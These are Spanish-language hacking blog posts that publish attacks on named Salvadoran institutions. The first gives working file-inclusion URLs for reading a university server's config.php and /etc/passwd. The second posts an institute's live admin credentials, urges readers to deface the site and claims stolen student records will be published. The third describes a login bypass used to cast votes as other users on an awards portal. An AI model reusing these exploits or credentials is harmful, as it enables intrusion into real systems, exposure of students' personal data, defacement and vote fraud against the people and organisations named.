hackeando la UFG(Universidad Francisco Gavidia)

Bueno le llego el turno a la Universidad gavidia.

el bug que les presento nos servira para ver el codigo fuente de cualquier archivo del servidor de principal donde esta alojado el sitio web, vamos a ver el codigo fuente de los archivos de configuracion, los usuarios y password que ocupan para conectarse a la base de datos y usuarios y password del sistema operativo.

el bug se basa en la mala validacion de los parametros que reciben el bug lo econtre en la pagina index.php :

http://www.ufg.edu.sv/ufg/index.php? module=Gateway&type=user &func=view&url=http://www.ufg.edu.sv/ufg/institucional/vision.html &jseid=1&jitemID=4

en donde ocupan una variable llamada URL el cual como se ve en el link anterior llama a otra pagina y la despliega dentro index.php.

lo que hice primero es ver si puede ejecutar codigo atravez del bug RFI, pero no sirvio asi que lo que hice fue cambiar la ruta del archivo que llama por uno que este en el servidor local asi:

url=http://... etc.

y lo cambie por un archivo que este localmente y como ellos ocupan PostNuke tiene que existir un archivo config.php donde esta la configuracion del portal osea el usuario el password de la base de datos.

url=config.php

el link completo queda asi:

http://www.ufg.edu.sv/ufg/index.php? module=Gateway&type=user&func=view&url=config.php

cuando den click en el siguiente link veran que no aparece nada pero al ver el codigo fuente de la pagina mostrada podemos ver algo asi:

http://hackersalvatrucho.googlepages.com/configdelaufg.gif

ahora que ya vimos el archivo de configuracion podemos ver otras cosas interesantes como los usuarios del sistema operativo

http://www.ufg.edu.sv/ufg/index.php? module=Gateway&type=user&func=view&url=/etc/passwd

ahora ya saben como ver cualquier archivo del servidor solo necesitan variar el parametro url y listo ;-)

si saben un poco de linux sabran que hay mas archivos interesantes que ver.

experen otros bug proximamente......

les gusto esto?? esperen mas bug proximamente.

hackeando al ITCA

Para los que quieran curiosiar, modificar o hacer lo que quieran con la pagina del ITCA les dejo el usuario y el password de el aula virtual del ITCA.

usuario:admin
Password: SisTem15VT07

se preguntaran como lo obtube?? pues entre hace un tiempo con un bug RFI del aula virtual que ellos ocupan y subi un programa que me ayudo a ver todas las bases de datos que ellos tiene en ese server y busque los datos que les estoy mostrando.

tambien obtube todas las notas, direcciones, email, y otros datos personales de los alumnos del ITCA que algun dia voy a publicar.

ocupen esta info con sabiduria y no cambien el password para que varios podamos usarlo.

DIVIERTANSE MUCHO.

el usuario y password es para usarlo aqui:

http://virtual.itca.edu.sv/

PD: si la hackean publiquenla en zone-h en el siguente link:
http://www.zone-h.org/component/option,com_notify/Itemid,89/

tengo otros bug de universidades que los publicare tambien.
esperenlos...

Arroba de Oro

La arroba de oro es un portal creado para premiar las mejores paginas de centroamerica.

Visitando el portal de la Arroba de Oro encontre un bug en la pagina de login por lo que he creado un formulario con html y javascript para facilitar los votos sin necesidad de conocer la contraseña.

pensando que hacer con esta informacion decidi poner este blog donde publicare los bug de las paginas salvadoreñas(he econtrado otras muy interesantes que despues publicare)

Si quieres votar a nombre de otra persona registrada en la arroba de oro, solo tenes que introducir un correo o parte de el y precionar el boton y entraras a la arroba de oro.

Ingresa un email o parte de el:




Ya pensaste en el dinero que esta en juego en esto????. inmagina un programa mas elaborado que vote automaticamente, mmmmmmm.


Si te ha gustado esta pagina dejame un comentario.